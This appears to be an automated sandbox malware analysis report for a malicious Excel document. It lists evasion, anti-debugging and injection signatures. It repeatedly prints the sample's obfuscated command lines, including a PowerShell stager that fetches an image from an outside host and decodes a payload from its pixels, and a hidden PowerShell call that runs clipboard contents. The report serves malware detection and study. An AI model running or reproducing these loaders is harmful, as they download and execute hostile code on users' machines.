Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /CEchO ^^^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15)*16)-bor(${P}.'G' -ba
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^& (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte & (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /CEchO ^^^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15)*16)-bor(${P}.'G' -baJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^& (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte & (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\clip.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\clip.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3492Thread sleep time: -922337203685477s >= -60000s
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformation
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /CEchO ^^^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15)*16)-bor(${P}.'G' -baJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EchO ^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^|^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\clip.exe CLip
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^& (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte & (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /V:ON/C'set d0=rMc5( ''Fj$hEJOYU2uwf=ip7CGdI-klmngTR,H34/^|B]Lbs'o%AXvy1[V_0{D;+:}*^&x\aPSW6^^9`etK).N&&for %x in (12,2,11,14,5,5,5,75,75,75,67,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,12,1,48,37,48,28,35,48,37,48,72,12,35,29,48,81,5,5,4,7,60,55,65,60,17,65,60,59,65,7,5,29,20,48,17,27,26,48,37,48,53,51,48,37,48,0,22,70,46,31,78,64,48,81,5,5,4,5,5,56,35,54,71,12,44,4,7,60,59,65,60,55,65,7,29,8,5,48,1,51,35,48,37,48,38,48,81,5,5,81,62,5,5,82,4,7,60,59,65,60,55,65,60,17,65,7,5,29,20,5,48,47,12,48,37,48,79,29,48,37,48,22,79,12,1,48,81,5,5,4,7,60,55,65,60,59,65,60,17,65,60,40,65,60,39,65,7,29,20,5,48,70,48,37,48,53,70,0,22,48,37,48,43,48,37,48,27,26,83,57,48,37,48,31,12,64,48,81,5,4,5,56,35,54,71,12,44,4,7,60,40,65,60,55,65,60,59,65,60,39,65,60,17,65,7,5,29,8,5,48,82,12,83,25,48,37,48,12,32,82,35,78,52,35,48,37,48,33,26,48,37,48,14,27,22,48,37,48,47,54,47,35,48,81,5,5,81,5,5,62,5,5,75,75,75,67,4,7,60,59,65,60,55,65,7,5,29,20,5,48,47,48,37,48,70,31,48,81,5,4,48,70,48,81,5,4,7,60,
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /CEchO ^^^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15)*16)-bor(${P}.'G' -ba
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EchO ^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^|^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^& (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
